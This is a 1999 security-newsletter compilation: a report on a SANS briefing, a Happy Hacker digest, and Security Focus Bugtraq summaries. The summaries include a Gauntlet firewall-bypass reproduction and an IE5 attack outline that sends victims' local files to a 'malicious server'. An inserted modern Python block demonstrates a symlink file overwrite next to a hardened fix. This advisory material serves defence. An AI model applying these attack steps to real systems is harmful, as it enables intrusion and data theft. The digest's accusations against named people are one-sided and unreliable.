http://www.computerworld.com/home/news.nsf/idgnet/9910181sans

(Online News, 10/18/99 04:58 PM)

SANS: Cybersecurity risks real
By Ann Harrison

BEDFORD, Mass. -- On behalf of IT managers whose bosses may be skeptical about security risks, the SANS Institute offered a briefing last week that took participants on four virtual "field trips" to the sites of cyberattacks.

The Washington-based cooperative research and education organization, which distributes information on computer security issues, held the briefing at MITRE Corp. The field trips were created to help IT managers debunk several myths that senior managers hold about computer security, said Alan Paller, the institute's director of research, who led the presentation.

The first scenario, at the Oroville Dam in the Central Valley of California, was designed to dispel the myth that computer crackers can't do real damage. Paller explained that in 1992, the FBI determined that a cracker had obtained root or administrative access to computers that controlled every dam in the northern part of California. Paller pointed out that even "noncritical" computers are networked to systems that have critical functions, such as controlling dam gates.

The second field trip involved a 1998 incident when a Massachusetts teen-ager broke into the Bell Atlantic telephone system and disabled communication at the Worcester airport, preventing the airport's control tower from turning on runway lights for incoming flights. The scenario debunked the myth that crackers who do access systems have no malicious intent.

Another example took on the notion that it is rare for someone to have enough skill and knowledge to break in to a professionally managed government computer. This scenario brought participants into a cracker's lab and showed the steps he might take to break in to a system.

A final scenario brought attendees into a mock U.S. intelligence debriefing to evaluate the indications and warning signs after a cyberwar.
The development of this scenario was funded by the National Security Agency and included power blackouts, passenger jet collisions, Alaska pipeline leaks and attacks on nuclear plants. The demonstration showed, among other things, how difficult it was to trace well-executed Web hacks due to Internet Protocol (IP) address spoofing, which can implicate innocent parties.

At the conclusion of the presentation, Paller noted that results of security vulnerability tests to avoid cyberattacks often load system administrators with more tasks than they can handle, jeopardizing overall system security. He noted that online SNAP (System and Network Assurance Program) classes and off-line workshops detailed at www.sans.org are aimed at helping system administrators identify critical security weaknesses, prioritize corrective action and provide intensive training in security skills.

Harold Leach Jr. of Legal Computer Solutions Inc. in Boston, which offers an Internet-based litigation support tool, said he was impressed by the presentation and interested in the SANS training. "It comes down to a question of risk, you fix the riskiest things first, but the problem is figuring out what the riskiest things are," Leach said.

@HWA

91.0 "INTERVIEW" WITH MISTUH CLEAN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Monday 18th October 1999 on 6:15 pm CET

Singapore is still in the bane of the hackers. Samantha Santa Maria of the Straits Times asked mistuh clean, who recently defaced several sites over there, some questions regarding the subject.

http://www.straitstimes.asia1.com/cyb/cyb3_1017.html

Unfortunately this url has expired and gave me a 404. I was unable to find this 'interview' anywhere on the net; this is one reason for an archival newsletter such as this, but I was too late in retrieving this story... sorry.

@HWA

92.0 Inside Happy Hacker Oct 20th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From AntiOnline mailing list.
http://www.antionline.com/

----------------------------------------------------------------
The following message was sent out via the AntiOnline Network.
Please keep in mind, that the views and opinions expressed in this
article are solely those of the message's author, and may not
necessarily be the views and opinions of AntiOnline.

Looking for a free e-mail account? Check out AntiOnline's Free Mail
Service at http://www.AntiOnline.com/mail/
-----------------------------------------------------------------

[Happy Hacker ASCII-art banner]

Inside Happy Hacker, Oct. 20, 1999
_______________________________________________________________________

Table of Contents

· New York Times Exposes Smear Campaign against Vranesevich
· The Stephen Glass Syndrome (reporters who write hacker stories that they know are false)
· Where the heck have we been?
· Call for editors

*** New York Times Exposes Smear Campaign against Vranesevich
_______________________________________________________________________

Just in case you are wondering whether the stories Sprenger, Koch, and Penenberg have written about Vranesevich could possibly have any substance, please read a recent article in the New York Times about him. Reporter Matt Richtel actually interviewed the people involved instead of writing stories manufactured by Brian Martin and his imaginative crew at Attrition.org. Following are some highlights of Richtel's report:

http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html

· The new Vranesevich started to help government officials find people accused of malicious hacking. He said he turned over information to the FBI that led it to raid the home of a hacker named Brian Martin in connection with an attack on The New York Times' Web site in September 1998.
· Martin, who admits to some malicious hacking in his past but says he has been an above-board security consultant for years, is a member of Attrition.org, a hacker group that has spearheaded an effort to discredit Vranesevich.

· The group also says that Vranesevich paid a hacker to break into the Web site of the United States Senate so that AntiOnline could be the first to report it -- an accusation Vranesevich denies. Special Agent Jim Margolin of the FBI said the agency does not comment on whether it has investigated someone in the past. "But we continue to consult with Mr. Vranesevich, and that should say something about our assessment of his bona fides," he said.

· his site continues to grow... Vranesevich runs it out of a rented three-room office space in Beaver, and said it gets "hundreds of thousands" of visitors each month. He has one full-time employee, paid and unpaid freelancers, and eight informers who keep him up to date on hacker activity. Among the site's users are research firms who are putting faith in Vranesevich to help them understand computer security. For example, he is working with Klein Associates, a consulting firm near Dayton Ohio that advises companies on decision-making techniques.

So, folks, there you have it. A respected reporter (Matt Richtel) from the world's most prestigious newspaper (The New York Times) actually researched his article. He actually talked to the FBI instead of (as did Sprenger, Koch and Penenberg) trying to trick people into believing a malicious story about an FBI investigation concocted by criminal hacker suspect Martin.

I can hardly believe that Penenberg who exposed Stephen Glass -- would risk losing his career by going along with Martin's scheme to smear Vranesevich. Could it possibly have something to do with the book Penenberg told me he is writing about hackers?
Could he and the other two reporters who have written stories invented by Martin possibly be vying to get exclusive rights to the story of the hacking spree of Hacking for Girliez/Loan Gunmen? Nah, I'm probably just paranoid.

Well, it's time to sign off and get back to playing with SuSE Linux. I'm building a new Hacker Wargame box with SuSE, lady.happyhacker.org. Meanwhile, Vranesevich is working on raising funding to pay someone to administer the Hacker Wargame full time so we can teach you serious computer security techniques in a fun environment.

I feel honored to know Vranesevich, and look forward to the day when the people running the smear campaign against him suffer the fate of Stephen Glass. Oh, in case you were wondering, Glass has been studying to be a lawyer.

*** The Stephen Glass Syndrome

See http://www.forbes.com/columnists/penenberg/1999/0927.htm for the phony story against John Vranesevich that Penenberg recently wrote. If you are a reporter, call me at 505-281-9675 and I'll give you contact information for witnesses who can demonstrate that almost every item in Penenberg's story is false.

Specifically, Penenberg recycles every unfounded allegation made against Vranesevich that any reporter has ever been unethical enough to pick up from Martin's web site. In private conversations with me, however, Penenberg has admitted he knows Martin has no credibility.

Penenberg was elevated to a senior editor of Forbes on the basis of his article "Lies, damn lies and fiction" in Forbes Digital Tool (May 11, 1998). This broke the story behind "Hacker Heaven," an article in the New Republic by Stephen Glass. Unfortunately the Forbes web site no longer carries Penenberg's article. However, the Columbia Journalism Review has an excellent story on the Glass hacker hoax at http://www.cjr.org/year/98/4/glass.asp.
Following is an excerpt:

How a Writer Fooled His Readers
by Ann Reilly Dowd

Dowd, a free-lancer, is former Washington bureau chief of Money and Fortune

"We're going to Bethesda," Charles Lane, the editor of The New Republic, told Stephen Glass, the writer of a May 18 story, "Hack Heaven," that was being called factually challenged by reporters over at Forbes Digital Tool, the Forbes magazine Web site. And in Bethesda, Maryland, at the building where Glass had supposedly covered a computer-hackers' convention, Lane says his twenty-five-year-old star gave "the most detailed step-by-step account" of where he had sat, and with whom he had spoken. It was only when Lane reminded him that the building's log and security videos would show who was actually there that day that Glass broke down and sobbed. Yes, he confessed, he had made up the conference. In truth, Lane says, the entire article had been created "out of whole cloth." So, it turns out, were others.

Stephen Glass was a bright, prolific writer and prodigious reporter. He had a likable demeanor, an eye for detail, and an ear for language. He also had a fatal flaw -- a stunning lack of integrity...

How was it possible that editors and checkers, who make their living as professional skeptics, got so snookered? When did it begin, and why?

Glass gamed the system, and brilliantly. He'd often submit stories late to the checkers so they were pressed for time. When they questioned his material, Lane says, Glass would provide forged faxes on fake letterheads of phony organizations, as well as fictitious notes, even voice mail or actual calls from people pretending to be sources.

*** Where the heck have we been?
_______________________________________________________________________

Yes, we're still alive! Sorry for the long time not sending out mailings. If you visit our web site from time to time, you'll see new features. Actually, there's plenty of new material there. Check it out!
Also, we've had severe problems for almost two months with a bad T1 in our Amarillo operations. So when you saw supposedly broken pictures or got a "connection reset by peer" message, that was just one after another technical screwup on the part of the backbone (Sprint, if you really want to know).

We are coping with that situation by mirroring the Happy Hacker web site on both the Antionline servers in Beaver, PA, while keeping another server up at SAGE, Inc.'s Amarillo site. The SAGE server we are using is the recently released commercial version of their BRICKHouse server. Its name is http://gabriel.happyhacker.org, 206.61.52.31. Try to break into her -- please! That's what beta testing is all about! The other is, um, well, I'm not supposed to tell (oh, no, security by obscurity!). But, hey, typing http://happyhacker.org or http://www.happyhacker.org will get you there unless you run into a DNS server that doesn't update too often.

I (Carolyn Meinel) have also been busy working on our Hacker Wargame. People who were persistent discovered three new computers on the Wargame in August and September. No one got root, but I did preserve all files on meyer.happyhacker.org, an OpenBSD server. When I put it back up (probably next week), the folks who figured out the ridiculous guest password and the few who got into guest2 using find and grep can get back into the game and play with those two "find" executables. Someone forgot to compile in the "bash hide" option on one of them, tsk, tsk.

In general, the concept of the wargame is to figure out what is happening there yourself. If you have to ask me what computers are there and how to break in, you aren't ready yet to play the game. The basic concept is to look for computers whose IP addresses resolve to something that ends with "happyhacker.org." See the Happy Hacker bookstore (http://happyhacker.org/bookstore.html) for computer manuals that will help get you up to speed, and read our Guides and Digests.
Oh, yes, don't forget The Happy Hacker book.

Don't email me with questions! Please! I have reached email meltdown and mostly just delete everything nowadays. Also, people who email me asking for help committing crime will discover that they are being immortalized at http://happyhacker.org/sucks.html.

I've also been working on a shell account server, http://shells.techbroker.com. I had it on the Wargame for almost two months with two easy to crack accounts (one was user name test, password test). The Tg0d gang got inside and was messing around and not getting root. That made me feel good about the security, which was created by Satori and B-lips. When it goes back up online in a few days, check it out for instructions on how to set up a home Windows 95/98 LAN and set up an Internet gateway so all your computers can access the Internet simultaneously through just one modem.

We will be selling shell accounts on shells.techbroker.com with tech support for people who want the power of a T1 for learning how to hack, and as a platform for competing in our Hacker Wargame. Of course we will not allow shells.techbroker.com to be used as a platform to commit crime.

Each Tuesday http://antionline.com posts a new "tip of the week" of mine. If you want to find out how to get online with Linux really easily, even easier than Windows, check out the tip archives. In a nutshell, the answer is, make sure your modem isn't a Winmodem, and install Caldera Linux (http://www.caldera.com). You can get an outstanding book on how to use Caldera at the Happy Hacker bookstore, http://happyhacker.org/bookstore.html.

Also, I've been working on my next book, "Uberhacker: How to Break into Computers." It will tell how to create Linux and WinNT attack computers, how to set up OpenBSD and Linux bastion computers, and how to set up a home hacker laboratory with many operating systems cheaply! As usual, I have to test everything. This keeps me rather busy.
Not only that, in order to be helpful to you who will read the book, I try everything on many different computers with many different operating systems, and do half a dozen installations of each operating system on several different hardware configurations. Whew!

I've finished working with Red Hat Linux. Right now I am experimenting with SuSE Linux (http://www.suse.de), which comes with a totally awesome 5 gigs worth of programs, including many of great interest to hackers, such as nmap and SAINT. I'm also still playing with Caldera, which is easier to install than Windows 98. Next on my list are Debian Linux (http://www.debian.org) and Solaris (http://www.sun.com).

*** Call for Editors

We lost our Windows Digest editor Keydet89 because he objected to John Vranesevich donating his listserv services to us. Keydet89 had several angry conversations with me in which he made it clear that he believes the allegations made against Vranesevich by Brian Martin's hacker gang, as seen at http://attrition.org.

Our Unix editor also quit. As you saw in his last Digest, he was angry at Vranesevich for pointing out to Harvard University that the Packetstorm web site they were hosting contained a photo of his kid sister, her home address, and incitements to harm her. Yes, I saw that material myself. Harvard immediately took down the site, and made a statement to the media that the reason was attacks on an individual and pornography. Please give the Harvard administration credit for being decent human beings, folks. And I have no desire to work with anyone who would hate Vranesevich for protecting his kid sister.

I apologize to you who have subscribed to this mail list for not having done a better job of evaluating the character of two of the people who were our editors. I was looking foremost for technical talent. I failed to adequately consider the issue of values.

If anyone would like to take over the jobs of Windows editor and Unix editor, please phone me at 505-281-9675.
(Sorry, with there being way too much email, I usually just delete it unless it is from someone I know.)

This time around I will make sure that anyone who does volunteer work for us agrees that the attrition.org web site has serious ethical problems. I mean, get real. Attrition.org carries instructions for how to shoplift without getting caught and advocates murder, burglary, perjury and computer crime. Common sense alone should tell anyone that its proprietors must also lie like rugs.

If you applied before, please consider doing so again. I apologize in advance for not choosing you, OK?

These jobs pay nothing except the sense of satisfaction of helping people to learn about computers. OK, the job also gives you something to put on your resume and gives you visibility in the computer security industry. Also you can get into the inner circle of Happy Hacker and hang out with us terminal geeks. Wowie!

If you take the job, you will have to put up with people from Brian Martin's Attrition.org emailing and phoning you with fanciful, malicious stories. If you do a good enough job, it is also possible that computer criminals will persuade their stable of credulous or unethical reporters (Polly Sprenger of Wired, Lew Koch of Cyberwire Dispatch, and Adam Penenberg of Forbes) into writing false and malicious stories about you, just as they have about Vranesevich. So, if you are an ambitious masochist -- is this the perfect job, or what?

_______________________________________________________________________

To subscribe to the Happy Hacker Digest, email mailman@mailout.antionline.net with the message "subscribe happyhacker." Unsubscribe with message unsubscribe happyhacker.

This is a list devoted to *legal* hacking! If anyone plans to use any information in this Digest or at our Web site to commit crime, go away! We like to put computer criminals behind bars where they belong!

Hacker Wargame Director, Vincent Larsen ; Clown Princess: Carolyn Meinel
Happy Hacker, Inc.
is a 501 (c) (3) tax deductible organization
_______________________________________________________________________

@HWA

93.0 Security Focus Newsletter
~~~~~~~~~~~~~~~~~~~~~~~~~

Security Focus Newsletter 10 & 11

Table of Contents:

I. INTRODUCTION
II. BUGTRAQ SUMMARY
     1. Hybrid Cablemodem Remote Configuration Vulnerability
     2. Microsoft IE5 IFRAME Vulnerability
     3. RedHat PAM NIS Locked Accounts Vulnerability
     4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities
     5. Jana Webserver Vulnerability
     6. Novell Client Denial of Service Vulnerability
     7. SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability
     8. SCO cancel Buffer Overflow Vulnerability
     9. RedHat lpr/lpd Vulnerabilities
    10. OpenLink 3.2 Remote Buffer Overflow Vulnerability
    11. Gauntlet Firewall Rules Bypass Vulnerability
    12. Microsoft IE5 Javascript URL Redirection Vulnerability
III. PATCH UPDATES
     1. Vulnerability Patched: rpmmail Remote Command Execution Vulnerability
     2. Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities
     3. Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability
     4. Vulnerability Patched: Novell Client Denial of Service Vulnerability
     5. Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability
     6. Vulnerability Patched: Referer Tag Vulnerability (Roxen Webserver)
     7. Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability
     8. Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability
     9. Vulnerability Patched: RedHat lpr/lpd Vulnerabilities
    10. Vulnerability Patched: Microsoft IE5 Javascript URL Redirection Vulnerability
    11. Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability
    12. Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability
    13. Vulnerability Patched: Linux mirror Vulnerability (Debian)
    14. Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities
    15. Vulnerability Patched: Multiple Linux Vendor PAM NIS Locked Accounts Vulnerability
IV. INCIDENTS SUMMARY
     1. Interesting scans in the past few days (Thread)
     2. Random malfunction or hack?
     3. Notifying possibly compromised sites & SANS 99 (Thread)
     4. Site for sharing TCPDumps, firewall logs, etc.? (Thread)
     5. Log sharing
     6. Attack methodology
     7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread)
     8. RES: Anyone seen traffic headed for UDP port 31789? (Thread)
     9. Intrusion Detection rfc draft
    10. directed broadcasts to UDP ports 41508, 41524, 41530
V. VULN-DEV RESEARCH LIST SUMMARY
     1. Re: Guestbook perl script (error fix - Thread)
     2. The PcWeek crack
     3. Re: Cisco IOS password types overview. (Thread)
     4. Timbuktu32 (Thread)
     5. Re: solaris DoS (fwd)
     6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf)
     7. Newbie in Jeopardy
     8. Window manager - implementation bug/feature ??? (Thread)
     9. fbsd 3.3 ospf_monitor research (Thread)
    10. SSH and X11 forwarding
    11. NT SysKey should be breakable (Thread)
    12. 2 dodgy network programs
    13. Free BSD 2.2.x listen() problem / FTP exploit
    14. Classes? (Thread)
    15. possible gnome remote overflow
VI. SECURITY JOBS
    Discussion:
     1. yet another question about entering the security field (Thread)
    Seeking Position:
     1. Contact: I am looking for a good company to work for NYC - Edward Saxon,
     2. Contact: Looking for security system administration position - Ender Wiggin, Mike@aviary-mag.com
    Seeking Staff:
     1. Unix/Network/Security Engineer - NYC
     2. Developer needed - San Mateo - California
     3. Unix/Network Security Engineer Needed In Maryland
     4. Domain Expert / Security Development / IT / Logistics #123
     5. Security Verification Analyst #123
     6. looking for information security manager....
     7. Job opportunities in San Jose
     8. 3com Job Posting
     1. Perl Programmer/System Administrator - NYC
     2. Wirex: Linux Systems Administrator, Portland, Oregon
     3. 10+ positions in the Bay Area, LA
     4. Security Engineers in Waltham, MA
VII. SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS EVENTS
     1. New Scoring and Comments under Tools, Products, Library and Links
     2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
IX. SECURITY FOCUS TOP 6 TOOLS
     1. UCGI Vulnerability Scanner 1.56 (Windows & Unix)
     2. NTInfoScan (NT)
     3. SuperScan 2.0.4 (NT)
     4. PacketX (NT)
     5. Achtung (NT)
     6. Custom Attack Scripting Language (NT & Unix)
X. SPONSOR INFORMATION - Tripwire Security

I. INTRODUCTION
-----------------

Welcome to the Security Focus 'week in review' newsletter issue 10 & 11. We apologize for combining two weeks in a row. We have been working furiously on building infrastructure here at Security Focus. One of the results of this is that now you can rate and comment on essentially every item, product, paper and vendor on our site. Hopefully this new rating system will, over time, create an excellent community resource.

II. BUGTRAQ SUMMARY 1999-10-04 to 1999-10-19
---------------------------------------------

1. Hybrid Cablemodem Remote Configuration Vulnerability
BugTraq ID: 695
Remote: Yes
Date Published: 1999-10-05
Relevant URL: http://www.securityfocus.com/bid/695
Summary:
Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem.

2. Microsoft IE5 IFRAME Vulnerability
BugTraq ID: 696
Remote: Yes
Date Published: 1999-10-11
Relevant URL: http://www.securityfocus.com/bid/696
Summary:
Internet Explorer 5 will allow a malicious web page to read the contents of local files through a weakness in the IE5 security model.
Normally the document.execCommand method is restricted from reading and returning data on the local machine, however if the method is called from within an IFRAME this restriction can be circumvented. 3. RedHat PAM NIS Locked Accounts Vulnerability BugTraq ID: 697 Remote: No Date Published: 1999-10-13 Relevant URL: http://www.securityfocus.com/bid/697 Summary: Under some network configurations it may be possible to access locked NIS accounts due to a vulnerability in the PAM authentication modules shipped with RedHat version 6.1. This can lead to a local compromise where the password is known for a locked account. RedHat 6.1 for Intel platforms is the only vulnerable version. 4. WebTrends Enterprise Reporting Server Multiple Vulnerabilities BugTraq ID: 698 Remote: Yes Date Published: 1999-10-09 Relevant URL: http://www.securityfocus.com/bid/698 Summary: Certain versions of the WebTrends Enterprise Reporting Server contain a series of vulnerabilities. Namely versions 1.5 and previous, the vulnerabilities in question are be: 1. Logging via the server will write to a world/writable file. Under certain conditions this file may contain certain sensitive information such as usernames and passwords, in clear text. This in particular is known to occur if you are not running using PAM (Pluggable Authentication Module). If the server is running without PAM, users must use the server provided interface to create new users and set their passwords. In this case, by default, everything (including username and password) is stored in clear text in the file "interface.log" with read/write permissions for user, group and other. Any local user can read that file. If a WebTrends user has also an shell account on the box with the same password, that account can be compromised. 2. The server stores its' user information in files with world read/write permissions. All user information is stored in the directory "wtm_wtx/datfiles/users" in the format "username.usr". 
Those files are with owner/group/other read/write permissions. Any local user, can decrypt the password or even easier alter/delete the user file and therefore create a denial of service. 3. User profiles are stored in world readable, writable files. By altering these files it may be possible to launch a denial of service attack. As with the user files all profile information is stored in "wtm_wtx/datfiles/profiles" with owner/group/other read/write permissions. Any local user can alter/delete the profile file and therefore create a denial of service. 4. Under default installations, a blank username and password is enabled. This will allow remote users to access the server with administration privileges to the software if the owner neglects to change this. 5. Jana Webserver Vulnerability BugTraq ID: 699 Remote: Yes Date Published: 1999-10-08 Relevant URL: http://www.securityfocus.com/bid/699 Summary: The Jana webserver is remotely vulnerable to an attack which can allow hackers to view files outside of the root httpd directory. See the bugtraq posting linked to from the references section of this vdb entry for more information. We have not been able to locate the maintainer of this product (The Jana webserver). If anyone has any information about who to contact for information regarding this issue, please contact vuldb@securityfocus.com. 6. Novell Client Denial of Service Vulnerability BugTraq ID: 700 Remote: Yes Date Published: 1999-10-08 Relevant URL: http://www.securityfocus.com/bid/700 Summary: Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer. 7. 
SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability BugTraq ID: 701 Remote: No Date Published: 1999-10-11 Relevant URL: http://www.securityfocus.com/bid/701 Summary: Under certain versions of SCO OpenServer there exists a symlink vulnerability which can be exploited to overwrite any file which is group writable by the 'auth' group. The problem in particular is in the the /etc/sysadm.d/bin/userOsa executable. When given garbage output the program will write out a debug log. However, the program does not check to see if it overwriting a currently existing file nor wether it is following a symlink. Therefore is it possible to overwrite files with debug data which are both in the 'auth' group and are writable by the same group. Both /etc/shadow & /etc/passwd fall into this category. If such an attack were launched against these files the system would be rendered unusable. 8. SCO cancel Buffer Overflow Vulnerability BugTraq ID: 702 Remote: No Date Published: 1999-10-08 Relevant URL: http://www.securityfocus.com/bid/702 Summary: There is a buffer overflow vulnerability in /opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel. It is important to know that the overflows are not in "/usr/bin/cancel" or "/usr/lpd/remote/cancel". The consequence of this vulnerability being exploited is compromise of effective groupid of group lp. 9. RedHat lpr/lpd Vulnerabilities BugTraq ID: 718 Remote: No Date Published: 1999-10-18 Relevant URL: http://www.securityfocus.com/bid/718 Summary: The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain vulnerabilities which may allow printing of files for which read access is not allowed. The first of the two problems is a race condition that can be exploited between the access checking and the opening of the file. The second is a symlink attack that could also be used to print files that normally cannot be read by a regular user (through lpr -s). 10. 
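The userOsa entry (BID 701) and the lpr entry (BID 718) share one root cause: a privileged program acts on a file *name* that an unprivileged user controls, so a planted symlink, or a swap between the access check and the open, redirects the write or read. The Python below is an added example, not code from the newsletter, SCO or Red Hat; the file and link names are constructed, and it contrasts the check-then-open pattern with an open that refuses symlinks and validates the descriptor it actually received.

```python
import os
import stat
import tempfile

# Added example (not from the newsletter or any vendor): the failure mode
# behind BID 701 (debug log written through a symlink) and BID 718 (name is
# checked, then opened), next to the hardened pattern. All names constructed.


def unsafe_write_log(path, data):
    """Vulnerable pattern: check the *name*, then open the *name*.

    access() and open() are two separate path lookups, so the target can be
    swapped between them (the lpr race), and open() follows a planted
    symlink without complaint (the userOsa overwrite)."""
    if os.path.exists(path) and not os.access(path, os.W_OK):
        return False
    with open(path, "ab") as fh:
        fh.write(data)
    return True


def safe_write_log(path, data, expect_uid=None):
    """Hardened pattern: create-or-fail, never follow a symlink, and validate
    the descriptor you got rather than the name you asked for."""
    if expect_uid is None:
        expect_uid = os.getuid()
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    try:
        fd = os.open(path, flags, 0o600)
    except OSError:
        # Something (regular file *or* symlink, dangling or not) already sits
        # at that name: O_CREAT|O_EXCL fails with EEXIST. Refuse rather than
        # append to whatever the link points at.
        return False
    try:
        st = os.fstat(fd)  # inspects the open file; nothing can be swapped now
        if (not stat.S_ISREG(st.st_mode) or st.st_uid != expect_uid
                or st.st_nlink != 1):
            return False
        os.write(fd, data)
        return True
    finally:
        os.close(fd)


def demonstrate():
    """Plant a symlink named like a debug log, pointing at a 'protected' file,
    and run both writers against it. Returns what each did to the target."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "shadow")  # stands in for group-writable /etc/shadow
        original = b"root:x:0:0\n"
        with open(target, "wb") as fh:
            fh.write(original)
        link = os.path.join(d, "userOsa.debug")  # constructed name for the link
        os.symlink(target, link)

        unsafe_result = unsafe_write_log(link, b"GARBAGE\n")
        with open(target, "rb") as fh:
            after_unsafe = fh.read()

        with open(target, "wb") as fh:  # restore before the second run
            fh.write(original)
        safe_result = safe_write_log(link, b"GARBAGE\n")
        with open(target, "rb") as fh:
            after_safe = fh.read()

        fresh = os.path.join(d, "fresh.debug")  # the legitimate, non-existent log
        fresh_result = safe_write_log(fresh, b"debug\n")
        with open(fresh, "rb") as fh:
            fresh_contents = fh.read()

    return {
        "unsafe_returned": unsafe_result,
        "unsafe_clobbered_target": after_unsafe != original,
        "safe_returned": safe_result,
        "safe_clobbered_target": after_safe != original,
        "fresh_returned": fresh_result,
        "fresh_contents": fresh_contents,
    }


if __name__ == "__main__":
    for key, value in demonstrate().items():
        print(f"{key}: {value!r}")
```

The same post-open fstat check is what removes the lpr race as well: once the decision is made on the open descriptor instead of the path, there is no window in which the name can be re-pointed.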
10. OpenLink 3.2 Remote Buffer Overflow Vulnerability
BugTraq ID: 720
Remote: Yes
Date Published: 1999-10-15
Relevant URL: http://www.securityfocus.com/bid/720
Summary:
Both the Unix and Windows NT versions of OpenLink 3.2 are vulnerable to a
remotely exploitable buffer overflow attack. The problem is in their web
configuration utility, and is the result of an unchecked strcpy() call. The
consequence is the execution of arbitrary code on the target host (running
the configuration utility) with the privileges of the web software.

11. Gauntlet Firewall Rules Bypass Vulnerability
BugTraq ID: 721
Remote: Yes
Date Published: 1999-10-18
Relevant URL: http://www.securityfocus.com/bid/721
Summary:
It may be possible to violate all firewall rules if certain conditions are
met when Gauntlet Firewall 5.0 is installed on the BSDI platform with a
specific configuration. The following things need to happen in the order
listed below for Gauntlet to be exploitable:

  1) Install BSDI 3.1
  2) Install Gauntlet 5.0
  3) Install BSDI patch M310-049
  4) Install Gauntlet 5.0 kernel patch level 2
  5) Remove any proxy settings on client machine.
  6) Set the default route on the client machine and attempt to connect to
     any host through a normal tcp connection.

This problem surfaces when connections are made through any adaptive proxy,
"old" proxy or no proxy at all. In order to exploit this, a route will need
to be specified since NAT will not occur when data is sent through the
affected firewall. None of the connections that ignore the rules are logged
in /var/log/messages.

Keith Young describes how to replicate the problem (this is taken directly
from his bugtraq post):

  1) Install BSDI 3.1, March 1998. Use automatic install, however you may
     install minimal packages if you wish.
  2) Mount the Gauntlet 5.0 CD-ROM. Execute /cdrom/fwinstall
  3) Install Gauntlet 5.0.
  4) Reboot after installation.
  5) Login as root.
  6) Enter "Fast GUI Setup". Fill in appropriate Interface settings for
     external and internal interfaces. If necessary, configure ESPM hosts,
     DNS settings, and admin users.
  7) Quit gauntlet-admin, save changes, and rebuild.
  8) After proxies have reconfigured, reboot machine.
  9) Since M310-049 is required for Gauntlet kernel patch install, and
     M310-046 is required for M310-049 installation, download both from
     ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/
     File info:
       M310-046   1194 Kb   Wed Oct 14 00:00:00 1998
       M310-049    116 Kb   Wed Dec 16 00:00:00 1998
     Both patches are considered "OK" by the Gauntlet support site:
     http://www.tis.com/support/bsd31.html
 10) Bring machine to single-user mode by executing "kill -term 1".
 11) Execute "perl5 M310-046 apply" to install BSDI libc patch.
 12) Execute "perl5 M310-049 apply" to install IP DoS fix.
 13) Execute "cd /sys/compile/GAUNTLET-V50/".
 14) Build new kernel as required by M310-049 IP DoS kernel fix.
       # make clean
       # make depend
       # make
 15) After kernel is rebuilt, reboot machine.
 16) Download Gauntlet 5.0 kernel and cluster patch:
     File info:
       cluster.BSDI.patch   12623 Kb   Wed Sep 01 19:33:00 1999
       kernel.BSDI.patch      414 Kb   Wed Aug 04 17:54:00 1999
 17) As noted in patch install directions, execute the following:
       # sh ./cluster.BSDI.patch
       # sh ./kernel.BSDI.patch
       # cd kernel.BSDI.patch
       # sh ./apply
       # cd ../cluster.BSDI.patch
       # sh ./apply
 18) After patches are installed, reboot machine.
 19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine
     to trusted network group. Apply changes.
 20) Start web browser on client machine. Set web proxy setting to internal
     interface of firewall. Attempt to connect to external web server.
     Access is allowed. *This is correct.*
 20) Remove http-gw from trusted network services. Apply changes. Attempt
     to connect to external web server. Access is denied. *This is
     correct.*

     ==Problem starts here==

 21) Remove proxy setting in web browser on client machine. Set
     gateway/default route on client machine to internal interface of
     firewall. Set gateway/default route on server machine to external
     interface of firewall.
 22) Clear web browser cache. Attempt to connect to external web server.
     Web page is downloaded with no logs in Gauntlet.
 23) Start ESPM-GUI. Remove all services from trusted networks services.
     Remove client machine from ESPM network group. Apply changes.
 24) FTP from client machine to server. FTP connection is made though no
     rule exists.
 25) Start telnet server on client machine. Telnet from server to client.
     Telnet connection is made.

12. Microsoft IE5 Javascript URL Redirection Vulnerability
BugTraq ID: 722
Remote: Yes
Date Published: 1999-10-18
Relevant URL: http://www.securityfocus.com/bid/722
Summary:
A malicious web site operator could design a web page that, when visited by
an IE5 user, would read a local file from the victim host (or any file on
the victim's network to which the victim has access) and send the contents
of that file to a designated remote location.

  1) In the instance noted above, the IE5 user visits a malicious web site.
  2) The web site instructs the client to open another IE5 browser window
     and display the contents of a file residing on the IE5 user's host (or
     another host on the network to which the IE5 user has access).
  3) Immediately after opening the new browser window, the window is
     instructed to browse to a specified web site, ie:
     http://malicious server.com/hack.cgi?doit.
  4) The hack.cgi?doit page does not return a web page, but instead
     redirects the window to a javascript URL containing embedded
     executable code.
  5) The javascript code (from step 4) can now access any files on the
     victim's host (or any file on the victim's network to which the victim
     has access) and send it to a location maintained by the malicious web
     site operator.

Under normal circumstances, javascript received from a non-local "security
